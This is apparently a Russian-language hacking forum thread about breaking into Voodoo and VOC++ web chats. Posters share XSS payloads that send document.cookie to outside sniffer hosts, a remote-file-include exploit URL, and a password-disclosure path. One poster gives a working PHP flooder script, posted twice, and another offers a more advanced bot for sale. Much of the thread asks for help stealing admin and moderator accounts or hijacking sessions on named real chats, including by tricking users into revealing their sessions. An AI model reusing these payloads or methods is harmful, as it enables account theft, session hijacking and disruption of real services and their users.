а что там качать? :)
Affected Software: Voodoo chat 1.0RC1b

Found3R: bd0rk

Website: www.soh-crew.it.tt

Contact: bd0rk[at]hackermail.com

Greetings: str0ke, Perle, TheJT, Shizoe

[+]Exploit: http://[yourh0st]/[voodoo_chat_dir]/data/users.dat

бага же древняя вроде! и тут уже обсуждалась!

я по milw0rm'y смотрю..
2006-12-30 Voodoo chat 1.0RC1b (users.dat) Password Disclosure Vulnerability
ну сорри тогда...

пароли читать, попробывал, не пашёт чёт.

в users.dat вроде содержаться не пароли а сессии пользователей!
и если папка data вынесена из директории www, то она будет недоступна(если ошибся поправьте)! я эту багу видел давно всего на одном чате и то ее уже прикрыли!

iesli vas naidzotsa programa katori mojet download na ftp vse faili ia vas pamagu ;)

']в users.dat вроде содержаться не пароли а сессии пользователей!
и если папка data вынесена из директории www, то она будет недоступна(если ошибся поправьте)! я эту багу видел давно всего на одном чате и то ее уже прикрыли!

в users.dat хранятся никнеймы, и хеши паролей пользователей чата ... но помоему уже никто data директорию в DocumentRoot не сует, в крайнем случае через .htaccess рубают.

Уже апсуждалось...Создаешь сайт с невидимым(или маленьким) фреймом(который указывает на хсс),кидаешь линк в чат и смотришь логи,там вроде на сессиях,так что не проворонь.



Можно поподробнее?

ПОМОГИТЕ
Как мне сформировать запрос если:
адрес чата http://darkside.tomsk.ru/
адрес снифера http://mysite.ru/snif.php


Если возможно, попробуйте угнать акк модера
nickname: toto
password:???

Народ! Я начинающий, ище маздайный античатер! расскажите мне как можно ломонуть вуду чат http://oko.sed.lg.ua:8080/chat/ , плиз! Но, ище, плиз пишете так чтоб было понятно даже юзеру. просто, я ище почти не соображаю в ломе чатов...

http://lom.dp.ua

Народ кто может прощупать на уязвимость этот чат , по ходу напоминает вуду, но хотелось бы узнать как можно сделать себя админом, то бишь дать себе права админа ж)))

http://lom.dp.ua

Народ кто может прощупать на уязвимость этот чат , по ходу напоминает вуду, но хотелось бы узнать как можно сделать себя админом, то бишь дать себе права админа ж)))
А чем тебе этот не устроил?
_http://lom.dp.ua/view.php?f=10102"><script>alert(document.cookie)</script>

сорри втупил спасибо большое :)

Один вопросик все же возник по поводу этой строчки , в окне , которое появляется высвечивается login: мой , пасс: без понятия чей(возможно админа) , и еще зашифрованый код.
Вопрос : Чей это пасс - потому, что когда применяю пишет мол человек либо сидит в чате либо вы ввели неверные данные, опишите как работает эта комманда , зарание спасибо

Догадываюсь что зашифрованный код это хеш

как его расшифровать ?

Его расшифровать нельзя,а вот скачать словарик потом скачать password pro (он слова из словаря шифрует по тому же алгоритму и сравнивает) можно.

Мне подсказали что узнать пароль админа возможно только тогда, когда я достану его кукис, как это возможно, и есть ли какой то другой метод получения пароля админа? Неужели нету уязвимостей, никогда не поверю)

Ну тебе же дали Хss ими и воруй кукисы

ЧАТ - Voodoo. Спизд***л пасс от логина модератора! Когда захожу прав как у обычного юзера, мне сказали(тут на ачате) что возможно есть специальные команды типа _ban_ _kill_ или чё-та типа того. Изучал исходники, ничего там не нашел! Что это может быть! ЭТо Аккаунт модератора - 100%!

фига зло такое ..может его уже лишили модерских прав?? как заметили кражу пароля..?!

Всё разобрался, оказывапется ссылка на админку была сделана на маленьком смайле слева вверху )

Привет, принимайте новичка) помагите с получением сессий с \\www.love-chat.ru

Проблема в том что я обладаю не плохой СИ, но мало понимаю в сниферах=(

И ещё, как можно обычному юзеру (без XSS) посматреть свою сессию, а уж сказать её мне я его заставлю.

Заранее благадарю, с уважением ИЗ.

Привет, принимайте новичка) помагите с получением сессий с \\www.love-chat.ru

Проблема в том что я обладаю не плохой СИ, но мало понимаю в сниферах=(

И ещё, как можно обычному юзеру (без XSS) посматреть свою сессию, а уж сказать её мне я его заставлю.

Заранее благадарю, с уважением ИЗ.

Чат действительно Voodoo, чё то он грузитца как будто у меня dial-up стоит :confused:

Ну попповоду сниферов юзай поиск, тут про xss и сниферы уже можно томов 5 собрать! А сессию открой html страницу sendera (это тот прямоугольничег где ты текст печатаешь что бы отправить) в txt и найди session, выглядеть будет так session=dd165fb008f5aac025a34ec7fa788939

Или там где мой статус, кликни правой кнопкой и зайди в свойства (смотрел чат через IE 6)

Но предупреждаю! Я один раз с помощью СИ зоставил жертву выдать мне её сессию, но мне пришло лиж #1234, потом выяснил что в чате стоял фильтр!!! Так что придумаешь что нибудь!

Так и есть, если просто вбить сессию то фильтр её отфильтрует!

Здраствуйте. Помогите новичку с составлением запроса для XSS. Нашел стандартную уязвимость в одном Voodoo-чате :
http://xxx.xxx/go.php?url=javascript:alert(/test/);
Составил следущий код:
http://ххх.ххх/go.php?url=javascript:img=new%20Image();img.src="http://s.netsec.ru/cyber_rat.gif?"+document.cookie;

Но вместо рисунка появляется "[object]"

И еще :
alert(/test/); - выводит окошко с надписью /test/
но ни alert(test);, ни alert("test");, ни alert('test'); не выводят ничего.

alert(/test/); - выводит окошко с надписью /test/
но ни alert(test);, ни alert("test");, ни alert('test'); не выводят ничего.

magic quotes=on
;)

а нащет скрипта,думаю там филтр какой то стоит.
ну и толку с етой XSS мало.. и так кукизы не передаются, да и с кукизов толку мало.. сессия не в них

Знаю что лол) но обьясните как открыть html страницу sendera? если вы про просмотр хтмл кода, то у сендера он не открываетЦа.

neval где навископ скачать,а то ссылки везде убитые,а мой нависком непашет

2 Apel1sin
http://syzspectroom.phpnet.us/NAVUNS.rar точно рабочий.. залил только что

Ето пассивные Xss, вместо алерта фтыкай сниффер, кинь ссылку админу в приват, и надейся, и жди, что админ глупым оказался. Или как уже было выше сказано попробуй через фреймы =)

Блин пацаны всё уже пробовал на http://www.love-chat.ru/voc.php и три разных снифа засылал в ответ молчёк может что не так делаю? Вот мужчины не поленитесь объясните чайнику,но стремящемуся из чайников в самовары)), на пальцах как вы это делаете. А то тут такая ситуация админы-гестаповцы и все как один орут что наш чат не ломается обидно просто. Хочется большими буквами написать в центре "Свобода" и повесить рисунок паука)))). Помогите если не трудно

Уважаемые хакеры есле вам не трудно попробуйте чат http://chatica.ru

php Флудер для Voc чатов
vocflood.php

<?
######### #########
######### G h o _ s t [ c ] 2 o o 7 #########
######### #########
$k = mt_rand(0,99);
mt_srand(time() + (double)microtime()*$k);
$chat=$_GET['chat'];
$name=$_GET['name'];
$pass=$_GET['pass'];
$Text=$_GET['Text'];
$r = $_GET['r'];
$SID = join('',file("$chat./voc.php?user_name=$name&password=$pass&room=$r"));
$st1 = strpos($SID,"?session=");
$SID = substr($SID,$st1+9);
$st2 = strpos($SID,"&");
$SID = substr($SID,0,$st2); # сессия
$Color = mt_rand(0, 22); # случайный цвет
$Text = $Text.mt_rand(0,999);$Text = UrlEncode($Text);
$df = file("$chat./sender.php?session=$SID&mesg=$Text&user_color=$Color");
$df2 = file("$chat/logout.php?session=$SID");
echo "<script language=javascript>document.location.reload();</script>";
?>


и HTML форма для удобства


<HTML>
<h1>Voodoo chat flooder</h1><h2>by Gho_st</h2>
<form action="vocflood.php" method="GET">
Аддрес чата <input type=text name=chat value="http://"><br>
Ник <input type=text name=name><br>
Пароль <input type=text name=pass><br>
Строка <input type=text name=Text><br>
Комната <select name="r" class="input" tabindex="102">
<option value="0" selected>1</option>
<option value="1">2</option>
<option value="2">3</option>
<option value="3">4</option>
<option value="4">5</option>
</select>
<input type=submit value="Запустить">
</HTML>


уже вроде был выложен один флудер для voc чатов
мой флудер имеет некотрые преимущества перед ним
в частности не надо каждый раз вписывать сессию
+ он рабоает циклично заходит отправляет сообщение выходит

таким образом забанить такого бота не такто просто



___
з.ы. есть более продвинутая версия бота
недорого ... пишите в асю

к сожелению при тестирование флудера на движке VOC++ Business Edition
было выявлено то что сообщения не отправляются
хм.. почему то вобще при передаче GET запросом сессии и текста сообщения мессага не отправляется=((
если ктонибудь знает в чем трабла просветите

ещё один XSS в Voc
http://sitename/chat/users.php?look_for=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E

У нас любимая бага была в сети..стоял у нас VOC++ Christ. Edit..ещё и дэмо =)
Собирали чел 5 и зажимали ENTER или пихали спички. Вот весёлые были времена :D

php Флудер для Voc чатов
vocflood.php

<?
######### #########
######### G h o _ s t [ c ] 2 o o 7 #########
######### #########
$k = mt_rand(0,99);
mt_srand(time() + (double)microtime()*$k);
$chat=$_GET['chat'];
$name=$_GET['name'];
$pass=$_GET['pass'];
$Text=$_GET['Text'];
$r = $_GET['r'];
$SID = join('',file("$chat./voc.php?user_name=$name&password=$pass&room=$r"));
$st1 = strpos($SID,"?session=");
$SID = substr($SID,$st1+9);
$st2 = strpos($SID,"&");
$SID = substr($SID,0,$st2); # сессия
$Color = mt_rand(0, 22); # случайный цвет
$Text = $Text.mt_rand(0,999);$Text = UrlEncode($Text);
$df = file("$chat./sender.php?session=$SID&mesg=$Text&user_color=$Color");
$df2 = file("$chat/logout.php?session=$SID");
echo "<script language=javascript>document.location.reload();</script>";
?>


и HTML форма для удобства


<HTML>
<h1>Voodoo chat flooder</h1><h2>by Gho_st</h2>
<form action="vocflood.php" method="GET">
Аддрес чата <input type=text name=chat value="http://"><br>
Ник <input type=text name=name><br>
Пароль <input type=text name=pass><br>
Строка <input type=text name=Text><br>
Комната <select name="r" class="input" tabindex="102">
<option value="0" selected>1</option>
<option value="1">2</option>
<option value="2">3</option>
<option value="3">4</option>
<option value="4">5</option>
</select>
<input type=submit value="Запустить">
</HTML>


уже вроде был выложен один флудер для voc чатов
мой флудер имеет некотрые преимущества перед ним
в частности не надо каждый раз вписывать сессию
+ он рабоает циклично заходит отправляет сообщение выходит

таким образом забанить такого бота не такто просто



___
з.ы. есть более продвинутая версия бота
недорого ... пишите в асю
Тоесть флудеров нету рабочих!?

Ну что будет флудер или нет???

здоров народ! сорі- але я слаб в руском! короче мне нужна ваша помочь з http://www.chat.uamafia.com! надо ваша помочь!

вот моя ася! 389089746- пишить если чо!

Прет! Короче такой вот бок у меня вышол! Мне приходят на снифф куки из чата на meta.ua(там походу вуду чат) ! Вот пример String: c_design=meta; c_hash=14a512f21614e9289927afaf0984298c; c_ulang=ru; c_user_color=14; tR; ui=UA8918T1195169226462; cl; adui=0UA52643edaT473daf3f; ltm=halfhour; scook=1
Я через Оперу заменяю значения своих куки на те что пришли! Но когда обновляю нифига не происходит-пароли и логин автоматом не заполняются!((((! Много раз пробовал заменять и ничего! Мож что то не то делаю?? Может подскажите Что то? А то я уже в шоке!ёп

И не заполнятся. В Вуду чатах в куках не содержится информации, способоной дать доступ к чужому аккаунту.

А Кто может взломать этот чат??? Репутация + ещё и денег дам.
http://www.sed.lg.ua:8080/chat/

народ я не очень хорошо разбираюсь по взлому... но мне очень хочется научиться ломать voodoo чаты...может кто не занят,а? уделит мне немного времени.... :rolleyes:

Народ кто знает как прописывать себе деньги в чате VOC++ Business Special Edition????и возможно ли такое??

Чето нефига не понял....
То что его поломать можно это 100% уже видел паломаные....
ну как ХЗ!!! :(

Народ , видал я вот такую багу в Voodoo :

Bug in : index.php
#
#Vlu Code :
#--------------------------------
#//here it can fails, i don't care. will be used default system language
#
# else
include_once($file_path."languages/".$language.".php");
#
#
include($file_path."designes/".$design."/index.php");
#?>
#================================================= ================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script
Path]/index.php?file_path=http://SHELLURL.COM?

только чего-то не выходит . пишет 404 ошибку . Так подскажите то ли я чего не так делаю , то ли пропачена уязвимость датирована она 2006-08-02 . Помогите разобраться

Патченная скорее всего версия...или просто другая версия) :)

А может быть я чего-то недопонимаю , тогда те кто уже юзали сей эксплойт ... объясните на пальцах плиз ...

Народ, помогите пожалуйста с http://chat.gtn.ru
там есть
http://chat.gtn.ru/go.php?url=javascript:alert(/document.cookie/)
формирую запрос:
http://chat.gtn.ru/go.php?url=javascript:img%20=%20new%20Image();%20i mg.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie
но на сниф ничего не приходит.
так-же там есть
http://chat.gtn.ru//password_reminder.php?look_for=%3Cscript%3Ealert(d ocument.cookie);%3C/script%3E>
формирую запрос:
http://chat.gtn.ru//password_reminder.php?look_for="><script>img%20=%20new%20Image();%20img.src%20=%20"http://s.netsec.ru/schut123.gif?"+document.cookie;</script>
На снифере никакого эффекта. Пусто.

Подскажите, как быть.. Возможно я неправильно запрос составляю. Или что-то еще..

schut123 ты куки не поимешь..ибо в вуду там сессия идёт.......вообщем хсс не катит......

А как тогда можно админку получить? Насколько я понимаю сули там тоже нет...
Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.

А как тогда можно админку получить? Насколько я понимаю сули там тоже нет...
Помогите найти уязвимости в этом чате, которыми можно реально воспользоваться.
Раньше спичкой разрывал чаты такие. Пихаеш спичку в ENTER и ждёш..

Ну а по делу кто-нибудь скажет что-нибудь?

По делу нет, а вот что бы такой чат похекать, надо хекать форум, канечно если такой есть, на том же сайте что и чат, БД одна на всех, мне это как то давно подсказали, и именно тогда получилось достать логины и пассы от админок в чате, а форум полет от sql inj.

дело говоришь..не только дело не в бд......самый простой спрособ взломать вуду енто найти на бажный форум, или стартовую(обычно стоят дефаил) потом лезишь сюды
/home/****/public_html/chat/admin/admin_users.php а там проль в админку лежит в каком виде ,
<?php $admin_users[0]["nickname"] = "***"; $admin_users[0]["password"] = "****"; ?>

самый простой способ!)

привет парни! у меня проблема из таким чатом!!! я не могу восползоватса сесией !я из Укр. я перехватил сесию и немогу ей воспользоватса!!

получал доступ по ИД сессии
ИД получал при помощи снифера :)
все просто

очень жаль что чат который меня интересует при смене пароля требует старый пароль поэтому даже с панели управления ник не угнать. только напакостить можно

давайте вместе подумаем как обойти подтверждение старого пароля при смене оного

Вот убитый чат: http://pro-chat.tomsk.ru
перфикс chat/ - работает на voodoo =)

кто может дать сниффер????



дам мазгадёра для воодоо.

принцип работы: автоматом заходит на чат и выходит из чата

а в чате пишется например

12:01:01 Вася зашел
12:01:02 Вася вышел
12:01:03 Вася зашел
12:01:04 Вася вышел

и этим чат заполняется

а админ не может выгнат потому что сессия каждый раз меняется

можно выгнать через offban если есть
_________________________

и почему никто не пишет что если захватить сессию можно и "voc.php?session=сессия" написать и зайти. откроется весь чат а не только sender.php

и есть кто нибудь с кем можно было бы посаветоватся по темам ява, пхп

Лучше залей на сайт снифер в место авы и сиди болдей!

так как С VOC++ Business Special Edition рабочие взломы админки есть?или никто ещё непридумал? :)

skajite rebiata shtoza versia

http://www.akoce.com


i kak mne dastats hash admina ia sdelal

xss no kinul mne svou hash no ia xochu hash admina

voobshem versiu skajite ((

skajite rebiata shtoza versia

http://www.akoce.com


i kak mne dastats hash admina ia sdelal

xss no kinul mne svou hash no ia xochu hash admina

voobshem versiu skajite ((
обычный вуду тока с обложкой красиваой! ;)
язык на чате фиг его знает орабский какойто! :D
версия 0.18.16
-=-=-=-=-=-=-=-=-=

NModern закинь сюда мазгадёра

а в чате пишется например

12:01:01 Вася зашел
12:01:02 Вася вышел
12:01:03 Вася зашел
12:01:04 Вася вышел

и этим чат заполняется

Всем привет! Ребят, протестите плиз вот этот чат http://licey24.lipetsk.ru/chat Админ полный ламер, недавно хоть догодался закрыть директорию http://licey24.lipetsk.ru/data через .htaccess

У меня хоть и не большие познания в javascript могу я следующим образом получить куки пользователя:

Кидаю к примеру ссыль юзеру в чат http://site.ru/file.html

file.html содержит следующий код
<a href="http://chatname.ru/go.php?url=javascript:window.location.href='http://site.ru/sniffer/'">Click</a>

Т.е смысл следующий юзер щелкает по ссылке и переходит по адрксу http://site.ru/file.html, оттуда он переадресуется на страницу чата http://chatname.ru/go.php, выполняется java script по переходу на страницу со снифером, снифер читает куки

Такое реально???

У меня хоть и не большие познания в javascript могу я следующим образом получить куки пользователя:

Кидаю к примеру ссыль юзеру в чат http://site.ru/file.html

file.html содержит следующий код
<a href="http://chatname.ru/go.php?url=javascript:window.location.href='http://site.ru/sniffer/'">Click</a>

Т.е смысл следующий юзер щелкает по ссылке и переходит по адрксу http://site.ru/file.html, оттуда он переадресуется на страницу чата http://chatname.ru/go.php, выполняется java script по переходу на страницу со снифером, снифер читает куки

Такое реально???
Правильнее будет на снифере сделать переадресацию
Когда юзер уже зайдёт на него

так для VOC++ никто ничего существенного и не нашёл?
VOC++ рулит!

а флудера так и нет рабочего? на Voc++ бизнес едишен ни 1 флудер из сдешних неработает) ещё недавно гдето тут был программой (не скриптом) флудер! работал ещё! сейчас зашёл хотел приколоться в стареньком чате) ан нет! тоже не работает)))) ну что мож кто что подскажет? ;)

вот xss
http://****.ru/chat/go.php?url=javascript:alert(/Tested%20by%20qBiN/);
вот снифер
_http://Flair.ezar.ru/sniff/s.gif
че терь нада сделать, какую ссылку нада сгенерировать чтобы, когда на нее зайдут мне в снифер пришли куки и т.д
напишите пожалуйста правельную ссылку чтобы xss работала :))

так для VOC++ никто ничего существенного и не нашёл?
VOC++ рулит!
Морально и технически устаревший код, который предприимчивые кодеры из креатив десинг обвешали модами, внеся еще большую путаницу в код, который не работает с большей частью броузеров рулит?

Чат устарел, дописывания для него модов уже неперспективное занятие, его только переписывать заново с учетом возможностей php5 и ajax.

здраствуйте)....нужна помощь...http://chat.shadrinsk.net/ -хочу заиметь права
на нём есть дырка- http://chat.shadrinsk.net./password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN%20test/);%3C/script%3E
перечитал кучу страниц инфы здесь, в голове образовалась каша :confused: , думаю позже рассасётся)
а пока потскажите пошагово какие действия предпринять?

Здравствуйте, товарищи.
Кто-нить может дать попользовацца флудером для voodoo-chat?
Конкретно для этого http://chat.flirt.ru/ - по некоторым данным это первый чат на движке voodoo, созданный Владом Востых. Типа чат-прототип. Я там давно тусуюсь, чат старый, без админов и модеров и какого-либо контроля.
В первую очередь интересует "мозгодёр" с входом-выходом, который уже несколько дней кто-то в этом чате применяет.

служба поддержки VDS manager
591-493-245

Всем привет!
Помогите взломать вот этот чат: http://www.strezhi.ru/chat/

Там есть два способа!
Залесть в инфу: http://www.strezhi.ru/chat/user_info.php?session=
И читать приваты: http://www.strezhi.ru:9014/?

Пробовал всё работает, только вот проблемма, сессии то не все дают... т.е. не у всех её выпросишь...
Вообщем-то у меня такой вопрос: Как можно заполучить сессию на этом чате, не прося её и такое вообще возможно?!

помагите найти слабые места в чате chat.waw.su .заранее спасибо буду рад любым предложениям